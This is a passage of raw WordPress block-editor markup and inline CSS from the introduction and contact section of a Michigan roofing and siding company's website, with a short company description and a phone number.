padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-c574290d-0b76-4326-958f-c0f3a4df2f20.background-type-video .skt-blocks-block-section {\n background-color: rgba(254, 131, 51, 1); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(254, 131, 51, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a0cc88e5-b846-45db-9d00-0bc679273fb7\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":32,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.3,\"headingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 32px !important; margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a0cc88e5-b846-45db-9d00-0bc679273fb7 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a0cc88e5-b846-45db-9d00-0bc679273fb7\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.3;letter-spacing:0;color:#ffffff\">Quality<br>Works</h2></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":15,\"leftPadding\":50,\"topPaddingTablet\":15,\"leftPaddingTablet\":35,\"topPaddingMobile\":40,\"leftPaddingMobile\":0,\"blockId\":\"ff268419-3a77-4274-b411-46ce7ae7d0da\"} -->\n<style type=\"text/css\"> .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 50px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: 35px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ff268419-3a77-4274-b411-46ce7ae7d0da .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ff268419-3a77-4274-b411-46ce7ae7d0da\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"819d03eb-ca79-4f68-a4a6-6e4c3c07bc39\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-819d03eb-ca79-4f68-a4a6-6e4c3c07bc39\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Our Introduction</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Welcome to Dunrite Roofing And Siding</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17},\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\"} -->\n<p class=\"section-content has-text-color\" style=\"color:#494848;font-size:17px\">Based in Northern Oakland County Dunrite Roofing has been serving the surrounding areas for over 25 years. Quality workmanship and competitive pricing&nbsp;have led us to become a top choice when it comes to roofing and siding in southeastern Michigan.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"8122658a-190a-460d-b1f0-852c8f7b6cfb\",\"topPadding\":0,\"topPaddingTablet\":0,\"bottomPadding\":80,\"leftPadding\":0,\"leftPaddingTablet\":0,\"rightPadding\":0,\"rightPaddingTablet\":0,\"topMarginTablet\":-15,\"className\":\"gb-renovation-contact\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-contact skt-blocks-block-section-outer-wrap block-8122658a-190a-460d-b1f0-852c8f7b6cfb background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: -15px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 10px; padding-left: 0px; padding-right: 0px; }\n}\n @media only screen and (max-width: 767px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 80px; padding-left: 0px; padding-right: 0px; }\n}\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-8122658a-190a-460d-b1f0-852c8f7b6cfb.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"3f3409af-10de-4bfb-a401-d63abd88d5a8\"} -->\n<style type=\"text/css\"> .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-3f3409af-10de-4bfb-a401-d63abd88d5a8 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-3f3409af-10de-4bfb-a401-d63abd88d5a8 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"7a9bd093-61fd-4461-ab61-5fdfe90ebaf2\"} -->\n<style type=\"text/css\"> .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7a9bd093-61fd-4461-ab61-5fdfe90ebaf2\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"744c4272-12fe-4eab-a56a-52601a4ce53f\"} -->\n<style type=\"text/css\"> .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-744c4272-12fe-4eab-a56a-52601a4ce53f skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"877b3099-59ef-4060-8f90-6cc25a54ff76\"} -->\n<style type=\"text/css\"> .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-877b3099-59ef-4060-8f90-6cc25a54ff76 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-877b3099-59ef-4060-8f90-6cc25a54ff76\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"9e8d4684-2921-4739-9ff7-fab97cf7d308\"} -->\n<style type=\"text/css\"> .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-9e8d4684-2921-4739-9ff7-fab97cf7d308 